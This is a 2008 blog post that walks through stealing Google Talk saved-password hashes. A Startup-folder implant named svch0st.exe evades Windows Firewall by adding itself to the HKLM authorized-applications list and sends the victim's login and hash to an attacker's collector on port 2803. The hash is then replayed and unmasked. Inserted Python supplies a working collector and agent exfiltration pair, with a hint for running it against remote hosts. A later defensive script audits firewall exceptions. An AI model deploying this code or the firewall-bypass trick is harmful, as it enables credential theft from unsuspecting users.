Tuesday, June 17, 2008

==== Google Talk and Password Saving Feature's Security ====

Do you save passwords?

This is a write-up about the Google Talk application and its password-saving feature.
Tested on Google Talk 1.0.0.104. When set to save the password, GTalk, like any other application, hashes and stores it for convenience, but in what appears to be a very secure manner.

I've developed a small client-server application which, when executed on the target, sends you the target's login name and hashed (or encrypted) password string. When successfully dropped into and executed from C:\Documents and Settings\All Users\Start Menu\Programs\Startup\, the application tricks Windows Firewall and is not met with the Unblock/Cancel popup box.

The application running on the attacker's end receives the hash and displays it. The attacker then replaces (or creates) his own saved password hash with the target's hash. After this, when the attacker launches Google Talk, the (asterisked) saved password is expected to be the target's.
A password unhider tool can then help the attacker reveal (unmask) the target's actual password.
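The client-server exchange described above, as an added example that is not part of the original post or its attached tools: a Python collector that listens on the port the write-up uses (2803 by default), an agent-side sender, and a line-oriented record format (`login<TAB>blob`) that is assumed here because the post does not describe the real wire format. The login name and blob are constructed placeholders; nothing in this block reads Google Talk's actual stored credential, and the collector drops malformed lines instead of trusting whatever arrives.

```python
import socket
import threading

# Constructed sample: the login name and the opaque saved-credential value the
# agent would ship. The blob is a made-up placeholder, not a real Google Talk value.
SAMPLE_LOGIN = "target@gmail.com"
SAMPLE_BLOB = "ZGVtby1ibG9i"

COLLECTOR_PORT = 2803  # port the write-up's CollectGTPass.exe listens on


def parse_record(line: bytes):
    """Parse one 'login<TAB>blob' line (assumed format); return None if malformed.

    The collector must not trust the wire: a non-ASCII or tab-less line is
    dropped rather than stored."""
    try:
        login, blob = line.decode("ascii").rstrip("\r\n").split("\t", 1)
    except (UnicodeDecodeError, ValueError):
        return None
    if not login or not blob:
        return None
    return login, blob


class Collector:
    """Attacker side: accept agent connections and keep the records received."""

    def __init__(self, host="127.0.0.1", port=COLLECTOR_PORT):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.records = []  # (peer address, login, blob)

    @property
    def port(self):
        return self.sock.getsockname()[1]

    def serve(self, max_records):
        """Accept agents until max_records have been stored.

        The write-up's tool waits forever; a bound keeps this demo finite."""
        while len(self.records) < max_records:
            conn, peer = self.sock.accept()
            with conn, conn.makefile("rb") as stream:
                for line in stream:
                    rec = parse_record(line)
                    if rec is not None:
                        self.records.append((peer[0],) + rec)
        self.sock.close()
        return self.records


def send_saved_credential(host, port, login, blob, leading_junk=b""):
    """Agent side: connect to the collector and ship one record.

    leading_junk lets the demo show that a garbage line is ignored."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(leading_junk + f"{login}\t{blob}\n".encode("ascii"))


def demo(port=0):
    """Run both sides over loopback; port=0 lets the OS pick a free port."""
    collector = Collector(port=port)
    server = threading.Thread(target=collector.serve, args=(1,), daemon=True)
    server.start()
    send_saved_credential("127.0.0.1", collector.port, SAMPLE_LOGIN, SAMPLE_BLOB,
                          leading_junk=b"not-a-record\n")
    server.join(timeout=5)
    return collector.records


if __name__ == "__main__":
    for peer, login, blob in demo(COLLECTOR_PORT):
        print(f"from {peer}: login={login} blob={blob}")
```

Run it as-is and both ends talk over loopback on port 2803, exactly the local setup the demonstration below uses; point `send_saved_credential` at another host's address to reproduce the remote case.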

[ Demonstration ]

- Save svch0st.exe (attached) to C:\Documents and Settings\All Users\Start Menu\Programs\Startup
- Execute CollectGTPass.exe (attached).
- CollectGTPass.exe opens port 2803 and waits for a connection from its target(s). In our case the target connects to 127.0.0.1, since client and server both run locally. The target IP and the attacker's connection IP are hard-coded in the exe: this is a demonstration, not a trojan tool for everyone.
- In the demonstration video (attached), XP Firewall prompted for CollectGTPass.exe (shown as GPWS2.exe in the video), and the application was then unblocked.
- When you test this locally, the firewall won't raise an alert, since the target connects to loopback. In the remote scenario, to avoid the alert, svch0st.exe adds itself to the AuthorizedApplications list under HKLM before connecting out (successfully tested, as shown in the video).
- Execute svch0st.exe.
- svch0st.exe sends the encrypted password to the collector on port 2803 (the attacker's IP, or 127.0.0.1 in the local demo).
- CollectGTPass.exe receives the encrypted password and waits for the next one; it waits forever so it can collect hashes from other targets.
- The tool has been successfully tested retrieving a target's hash remotely, both on a local network and over public IPs.
- Screenshots and a video of a successful local and remote retrieval, respectively, are attached.
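A defender's counterpart to the firewall-bypass step above, as an added example that is not part of the original post: a Python audit of the XP SP2 Windows Firewall exceptions list (HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, whose values take the form `<path>:<scope>:<Enabled|Disabled>:<display name>`). It flags entries that live in a Startup folder, run from outside Program Files or the Windows directory, or carry a look-alike of a system binary's name such as svch0st. The sample entries are constructed, the live read uses `winreg` only when the script runs on Windows, and the scoring rules are my own heuristics rather than anything the post describes.

```python
import ntpath
import re
from collections import namedtuple

# XP SP2 Windows Firewall exceptions list for the standard profile.
FIREWALL_LIST_KEY = (r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
                     r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

# Value data format: "<path>:<scope>:<Enabled|Disabled>:<display name>".
# The lazy path group backtracks past the drive-letter colon.
_ENTRY_RE = re.compile(
    r"^(?P<path>.+?):(?P<scope>[^:]+):(?P<state>Enabled|Disabled):(?P<name>.*)$")

Entry = namedtuple("Entry", "path scope state name")

# Constructed sample of (value name, value data) pairs; not taken from a real host.
SAMPLE_ENTRIES = [
    (r"C:\Program Files\Google\Google Talk\googletalk.exe",
     r"C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"),
    (r"C:\Program Files\Messenger\msmsgs.exe",
     r"C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"),
    (r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\svch0st.exe",
     r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\svch0st.exe:*:Enabled:svch0st"),
]

# Names an implant is likely to imitate; compare after undoing the usual
# digit-for-letter substitutions (svch0st -> svchost).
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe",
                "winlogon.exe", "services.exe"}
_SUBS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\windows\\")


def parse_entry(data):
    """Split one value's data into an Entry; None if it is not in the XP format."""
    m = _ENTRY_RE.match(data)
    return Entry(*m.groups()) if m else None


def reasons_for(entry):
    """Heuristic reasons an exception deserves a second look (assumed rules)."""
    reasons = []
    low = entry.path.lower()
    base = ntpath.basename(low)
    if "\\start menu\\programs\\startup\\" in low:
        reasons.append("executable lives in a Startup folder")
    if not low.startswith(TRUSTED_ROOTS):
        reasons.append("runs from outside Program Files / Windows")
    if base not in SYSTEM_NAMES and base.translate(_SUBS) in SYSTEM_NAMES:
        reasons.append("name imitates system binary " + base.translate(_SUBS))
    return reasons


def audit(entries):
    """Return [(path, reasons)] for every entry that trips at least one rule."""
    findings = []
    for name, data in entries:
        entry = parse_entry(data)
        if entry is None:
            findings.append((name, ["unparseable value data: " + data]))
            continue
        reasons = reasons_for(entry)
        if reasons:
            findings.append((entry.path, reasons))
    return findings


def read_authorized_apps():
    """Read the live list on a Windows host; returns [] anywhere else."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, FIREWALL_LIST_KEY) as key:
            i = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                entries.append((name, data))
                i += 1
    except OSError:
        return []
    return entries


if __name__ == "__main__":
    for path, reasons in audit(read_authorized_apps() or SAMPLE_ENTRIES):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

On a non-Windows box the script falls back to the constructed sample and reports only the svch0st entry; an entry added by a startup-folder implant is exactly what the Startup-folder and look-alike rules are there to catch.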

[ Question ]
So does it work? Do we get the target's password?
[ Answer ]
No, not directly.
We get the hash, and with a password-unmasking tool we view the password.
But the hashing algorithm is still unknown to me.
[ Moral of the Story ]
Don't save passwords. Everything isn't GTalk. A saved credential that can be copied off one machine and unmasked on another is only as safe as the machine it sits on.

[ What's Next? ]
Skype.
Video: http://senduit.com/96f520

.:credit:. .=.QuakerD00mer.=.
